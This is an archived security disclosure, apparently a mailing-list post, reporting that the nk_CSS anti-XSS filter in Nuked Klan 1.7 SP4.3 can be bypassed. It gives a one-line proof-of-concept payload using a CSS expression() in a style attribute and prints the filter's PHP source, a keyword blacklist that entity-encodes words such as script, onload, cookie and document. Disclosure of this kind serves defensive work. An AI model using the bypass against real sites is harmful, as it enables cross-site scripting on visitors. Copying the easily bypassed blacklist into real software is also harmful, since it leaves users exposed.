<<< Date Index >>>     <<< Thread Index >>>

Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed



// *- BEGIN -*

// By Blwood
// http://blwood.net <http://blwood.net/>

We can bypassed the function anti-xss called nk_CSS ( nuked.php) using like this :


<b id="blwood" style="width:expression(alert(' http://www.blwood.net')) <http://www.blwood.net%27%29%29/>"></b>


Here is the function :

function nk_CSS($str)

{
   if ($str != "")
   {
        $str = 
eregi_replace("content-disposition:","&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#45;&#100;&#105;&#115;&#112;&#111;&#115;&#105;&#116;&#105;&#111;&#110;&#58;",$str);


        $str = 
eregi_replace("content-type:","&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#45;&#116;&#121;&#112;&#101;&#58;",$str);
        $str = 
eregi_replace("content-transfer-encoding:","&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#45;&#116;&#114;&#97;&#110;&#115;&#102;&#101;&#114;&#45;&#101;&#110;&#99;&#111;&#100;&#105;&#110;&#103;&#58;",$str);


        $str = 
eregi_replace("include","&#105;&#110;&#99;&#108;&#117;&#100;&#101;",$str);
        $str = eregi_replace("\<\?","&lt;?",$str);
        $str = eregi_replace("<\?php","&lt;?php",$str);


        $str = eregi_replace("\?\>","?&gt;",$str);
        $str = 
eregi_replace("script","&#115;&#99;&#114;&#105;&#112;&#116;",$str);
        $str = eregi_replace("eval","&#101;&#118;&#97;&#108;",$str);


        $str = 
eregi_replace("javascript","&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;",$str);
        $str = eregi_replace("embed","&#101;&#109;&#98;&#101;&#100;",$str);


        $str = 
eregi_replace("iframe","&#105;&#102;&#114;&#97;&#109;&#101;",$str);
       $str = eregi_replace("refresh", 
"&#114;&#101;&#102;&#114;&#101;&#115;&#104;", $str);


       $str = eregi_replace("onload", "&#111;&#110;&#108;&#111;&#97;&#100;", 
$str);
       $str = eregi_replace("onstart", 
"&#111;&#110;&#115;&#116;&#97;&#114;&#116;", $str);


       $str = eregi_replace("onerror", 
"&#111;&#110;&#101;&#114;&#114;&#111;&#114;", $str);
       $str = eregi_replace("onabort", 
"&#111;&#110;&#97;&#98;&#111;&#114;&#116;", $str);


       $str = eregi_replace("onblur", "&#111;&#110;&#98;&#108;&#117;&#114;", 
$str);
       $str = eregi_replace("onchange", 
"&#111;&#110;&#99;&#104;&#97;&#110;&#103;&#101;", $str);


       $str = eregi_replace("onclick", 
"&#111;&#110;&#99;&#108;&#105;&#99;&#107;", $str);
       $str = eregi_replace("ondblclick", 
"&#111;&#110;&#100;&#98;&#108;&#99;&#108;&#105;&#99;&#107;", $str);


       $str = eregi_replace("onfocus", 
"&#111;&#110;&#102;&#111;&#99;&#117;&#115;", $str);
       $str = eregi_replace("onkeydown", 
"&#111;&#110;&#107;&#101;&#121;&#100;&#111;&#119;&#110;", $str);


       $str = eregi_replace("onkeypress", 
"&#111;&#110;&#107;&#101;&#121;&#112;&#114;&#101;&#115;&#115;", $str);
       $str = eregi_replace("onkeyup", 
"&#111;&#110;&#107;&#101;&#121;&#117;&#112;", $str);


       $str = eregi_replace("onmousedown", 
"&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#100;&#111;&#119;&#110;", $str);
       $str = eregi_replace("onmousemove", 
"&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#109;&#111;&#118;&#101;", $str);


       $str = eregi_replace("onmouseover", 
"&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#111;&#118;&#101;&#114;", $str);
       $str = eregi_replace("onmouseout", 
"&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#111;&#117;&#116;", $str);


       $str = eregi_replace("onmouseup", 
"&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#117;&#112;", $str);
       $str = eregi_replace("onreset", 
"&#111;&#110;&#114;&#101;&#115;&#101;&#116;", $str);


       $str = eregi_replace("onselect", 
"&#111;&#110;&#115;&#101;&#108;&#101;&#99;&#116;", $str);
       $str = eregi_replace("onsubmit", 
"&#111;&#110;&#115;&#117;&#98;&#109;&#105;&#116;", $str);


       $str = eregi_replace("onunload", 
"&#111;&#110;&#117;&#110;&#108;&#111;&#97;&#100;", $str);
       $str = eregi_replace("document", 
"&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;", $str);


       $str = eregi_replace("cookie", "&#99;&#111;&#111;&#107;&#105;&#101;", 
$str);
       $str = eregi_replace("vbscript", 
"&#118;&#98;&#115;&#99;&#114;&#105;&#112;&#116;", $str);


       $str = eregi_replace("location", 
"&#108;&#111;&#99;&#97;&#116;&#105;&#111;&#110;", $str);
       $str = eregi_replace("object", "&#111;&#98;&#106;&#101;&#99;&#116;", 
$str);


       $str = eregi_replace("vbs", "&#118;&#98;&#115;", $str);
       $str = eregi_replace("href", "&#104;&#114;&#101;&#102;", $str);
       $str = eregi_replace("src", "&#115;&#114;&#99;", $str);


} return($str); }

// *- END -*